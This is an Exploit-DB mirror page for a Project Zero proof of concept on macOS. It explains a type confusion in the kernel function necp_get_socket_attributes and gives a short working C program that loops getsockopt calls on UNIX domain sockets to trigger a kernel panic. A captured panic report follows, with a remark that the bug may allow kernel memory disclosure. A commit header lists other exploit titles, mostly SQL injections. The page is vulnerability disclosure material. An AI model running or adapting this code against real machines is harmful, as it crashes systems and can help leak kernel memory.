bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/macos/dos/43318.c
Offensive Security 9cea53a35b DB: 2017-12-12 
35 changes to exploits/shellcodes

MikroTik RouterBoard 6.39.2 / 6.40.5 DNS - Denial of Service
MikroTik 6.40.5 ICMP - Denial of Service
iOS/macOS - Kernel Double Free due to IOSurfaceRootUserClient not Respecting MIG Ownership Rules
macOS XNU Kernel - Memory Disclosure due to bug in Kernel API for Detecting Kernel Memory Disclosures
macOS - 'getrusage' Stack Leak Through struct Padding
macOS - 'necp_get_socket_attributes' so_pcb Type Confusion
LibTIFF pal2rgb 4.0.9 - Heap Buffer Overflow

Entrepreneur Dating Script 2.0.1 - 'marital' / 'gender' / 'country' / 'profileid' SQL Injection
Secure E-commerce Script 2.0.1 - 'searchcat' / 'searchmain' SQL Injection
Laundry Booking Script 1.0 - 'list?city' SQL Injection
Lawyer Search Script 1.1 - 'lawyer-list?city' SQL Injection
Multivendor Penny Auction Clone Script 1.0 - SQL Injection
Online Exam Test Application Script 1.6 - 'exams.php?sort' SQL Injection
Opensource Classified Ads Script 3.2 - SQL Injection
PHP Multivendor Ecommerce 1.0 - 'sid' / 'searchcat' / 'chid1' SQL Injection
Professional Service Script 1.0 - 'service-list?city' SQL Injection
Readymade PHP Classified Script 3.3 - 'subctid' / 'mctid' SQL Injection
Readymade Video Sharing Script 3.2 - SQL Injection
Responsive Realestate Script 3.2 - 'property-list?tbud' SQL Injection
Multireligion Responsive Matrimonial 4.7.2 - 'succid' SQL Injection
Responsive Events & Movie Ticket Booking Script 3.2.1 - 'findcity.php?q' SQL Injection
Multiplex Movie Theater Booking Script 3.1.5 - 'moid' / 'eid' SQL Injection
Single Theater Booking Script 3.2.1 - 'findcity.php?q' SQL Injection
Advanced Real Estate Script 4.0.7 - SQL Injection
Entrepreneur Bus Booking Script 3.0.4 - 'sourcebus' SQL Injection
MLM Forex Market Plan Script 2.0.4 - 'newid' / 'eventid' SQL Injection
MLM Forced Matrix 2.0.9 - 'newid' SQL Injection
Car Rental Script 2.0.4 - 'val' SQL Injection
Groupon Clone Script 3.01 - 'state_id' / 'search' SQL Injection
Muslim Matrimonial Script 3.02 - 'succid' SQL Injection
Advanced World Database 2.0.5 - SQL Injection
Resume Clone Script 2.0.5 - SQL Injection
Basic Job Site Script 2.0.5 - SQL Injection
Vanguard 1.4 - Arbitrary File Upload
Vanguard 1.4 - SQL Injection
2017-12-12 05:02:17 +00:00

69 lines
No EOL
2.8 KiB
C
Raw Blame History

/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1392&desc=2
When getsockopt() [edited; original report said "setsockopt"] is called on any socket with level SOL_SOCKET and optname SO_NECP_ATTRIBUTES, necp_get_socket_attributes is invoked.
necp_get_socket_attributes() unconditionally calls sotoinpcb(so):
errno_t
necp_get_socket_attributes(struct socket *so, struct sockopt *sopt)
{
int error = 0;
u_int8_t *buffer = NULL;
u_int8_t *cursor = NULL;
size_t valsize = 0;
struct inpcb *inp = sotoinpcb(so);
if (inp->inp_necp_attributes.inp_domain != NULL) {
valsize += sizeof(struct necp_tlv_header) + strlen(inp->inp_necp_attributes.inp_domain);
}
[...]
}
sotoinpcb() causes type confusion if so->so_pcb is of an unexpected type (because the socket is not an IPv4/IPv6 socket):
#define sotoinpcb(so) ((struct inpcb *)(so)->so_pcb)
If necp_get_socket_attributes() is called on a UNIX domain socket, this will cause the members of inp->inp_necp_attributes to be read from type-confused, probably also out-of-bounds memory behind the actual so->so_pcb (which is of type `struct unpcb`, which looks much smaller than `struct inpcb`).
To trigger this bug, compile the following code, run it, and cause some system activity, e.g. by launching the browser (the PoC won't crash if so->so_pcb contains NULLs in the right spots).
==============
*/
#include <sys/types.h>
#include <sys/un.h>
#include <sys/socket.h>
#include <err.h>
#include <unistd.h>
#define SO_NECP_ATTRIBUTES 0x1109
int main(void) {
while (1) {
int s = socket(AF_UNIX, SOCK_STREAM, 0);
if (s == -1)
err(1, "socket");
getsockopt(s, SOL_SOCKET, SO_NECP_ATTRIBUTES, NULL, NULL);
close(s);
}
}
/*
==============
On macOS 10.13 (17A405), this causes the following crash:
==============
*** Panic Report ***
panic(cpu 2 caller 0xffffff800e78a611): Kernel trap at 0xffffff800e976930, type 14=page fault, registers:
CR0: 0x000000008001003b, CR2: 0x000000fa000000cc, CR3: 0x0000000200037073, CR4: 0x00000000001627e0
RAX: 0x000000fa000000cc, RBX: 0x000000fa000000cb, RCX: 0xffffff800eb90aad, RDX: 0xffffff800eb90dcc
RSP: 0xffffff8018de3e70, RBP: 0xffffff8018de3e90, RSI: 0xffffff8018de3ef0, RDI: 0xffffff8032ac66a8
R8: 0x0000000000000001, R9: 0xffffffff00000000, R10: 0x0000000000000000, R11: 0x0000000000000246
R12: 0xffffff80357cf7d0, R13: 0xffffff8032d69a08, R14: 0xffffff8018de3ef0, R15: 0xffffff8032ac66a8
RFL: 0x0000000000010206, RIP: 0xffffff800e976930, CS: 0x0000000000000008, SS: 0x0000000000000010
Fault CR2: 0x000000fa000000cc, Error code: 0x0000000000000000, Fault CPU: 0x2, PL: 0, VF: 1
==============
This bug should be usable for disclosing kernel memory.
*/
Reference in a new issue View git blame Copy permalink